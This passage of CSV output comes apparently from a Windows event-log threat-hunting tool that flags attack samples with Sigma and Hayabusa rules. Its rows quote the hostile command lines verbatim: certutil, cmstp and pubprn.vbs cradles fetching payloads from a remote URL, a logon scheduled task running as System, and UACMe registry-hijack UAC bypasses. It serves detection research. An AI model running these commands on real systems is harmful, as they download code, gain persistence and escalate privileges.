747F3D96-6657-5D3F-0000-001011298D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 747F3D96-665C-5D3F-0000-0010096B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 
747F3D96-665C-5D3F-0000-0010DC6B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 
747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 747F3D96-6661-5D3F-0000-00107AB88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 747F3D96-6661-5D3F-0000-00103CBD8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 
747F3D96-6661-5D3F-0000-0010CBC88D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 747F3D96-6666-5D3F-0000-001016F78D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 747F3D96-6666-5D3F-0000-0010C6F88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 
747F3D96-6666-5D3F-0000-0010DF098E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo 
""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:36.421 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: 
SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 747F3D96-666C-5D3F-0000-00104BB78E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:36.548 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator 
Usage,,rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: 
SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:41.793 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 747F3D96-DCFE-5D3F-0000-001044D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: 
C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 747F3D96-6675-5D3F-0000-0010774E8F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 747F3D96-6675-5D3F-0000-0010875C8F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:48.726 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 
747F3D96-5809-5D45-0000-00100B233F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:49.436 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 18:46:49.502 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx 2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious 
Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys 